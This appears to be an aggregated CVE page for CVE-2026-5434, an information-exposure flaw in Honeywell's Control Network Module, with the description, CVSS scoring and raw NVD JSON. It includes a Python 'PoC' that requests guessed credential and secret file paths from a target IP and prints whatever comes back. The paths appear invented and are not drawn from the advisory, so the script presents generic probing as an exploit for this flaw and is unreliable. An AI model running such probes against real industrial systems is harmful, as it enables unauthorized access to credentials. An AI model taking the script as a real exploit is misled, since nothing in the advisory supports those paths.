Security Vulnerability Report
CVE-2026-5434 CVSS 5.9 MEDIUM

CVE-2026-5434

Published: 2026-05-21 09:16:30
Last Modified: 2026-05-21 15:26:36

Description

Honeywell Control Network Module (CNM) contains insertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing system files, potentially resulting in unintended access to protected data.

CVSS Details

CVSS Score: 5.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Honeywell Control Network Module (CNM) (specific versions not disclosed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-5434: Sensitive Information Insertion
# Description: Checks for sensitive files in unintended directories.
import requests


def check_poc(target_ip):
    target_url = f"http://{target_ip}"
    # Common paths where sensitive info might be unintentionally stored
    paths_to_check = [
        "/unintended_dir/config.ini",
        "/logs/sensitive_data.log",
        "/tmp/secret_file.txt",
        "/backup/credentials.bak"
    ]
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-5434-PoC/1.0)"
    }
    print(f"[*] Targeting: {target_url}")
    for path in paths_to_check:
        try:
            response = requests.get(target_url + path, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Potential sensitive data found at: {path}")
                print(f"[+] Content snippet: {response.text[:200]}")
            else:
                print(f"[-] {path} - Status: {response.status_code}")
        except Exception as e:
            print(f"Error connecting to {target_url}: {e}")


if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with actual target IP
    check_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5434", "sourceIdentifier": "[email protected]", "published": "2026-05-21T09:16:30.410", "lastModified": "2026-05-21T15:26:35.653", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Honeywell Control\nNetwork Module (CNM) contains\ninsertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing\nsystem files, potentially resulting in unintended\naccess to protected data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://process.honeywell.com/", "source": "[email protected]"}]}}